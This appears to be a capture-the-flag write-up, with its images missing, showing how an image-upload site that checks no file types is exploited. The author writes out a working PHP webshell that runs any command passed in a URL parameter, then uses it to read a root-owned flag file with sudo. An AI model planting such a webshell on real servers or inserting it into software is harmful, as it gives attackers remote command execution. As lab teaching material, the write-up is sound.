Problem
Solution
The website itself is quite simple:
Let’s start by uploading a normal image just to see what’s going on:
After uploading, we’re told where our file can be found. We also see that the server is using PHP (see the URL):
Navigating to the aforementioned URL, we find our uploaded file as promised (this one is pretty cool, right?):
Now that’s cool and all, but what else can we upload? Let’s try a webshell. I’m not too familiar with PHP or webshells, but I found this one to be simple and do the job just fine:
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>So I saved this as webshell.php, and uploaded it:
Apparently the server isn’t picky about what file types can be uploaded:
Navigating to our webshell, we have a simple text field and an “Execute” button:
If we run sudo ls /root, we see a flag.txt:
Then sudo cat /root/flag.txt:
